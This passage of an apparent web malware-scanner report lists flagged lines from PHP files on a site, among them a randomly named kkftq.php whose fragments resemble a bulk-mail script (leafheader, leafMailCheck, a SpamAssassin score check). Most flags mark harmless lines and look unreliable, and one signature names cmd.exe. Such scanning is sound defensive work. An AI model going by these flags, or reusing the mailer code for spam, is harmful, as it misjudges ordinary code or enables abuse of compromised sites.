<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_95").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/kkftq.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:44:00</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:44:00</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_96" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
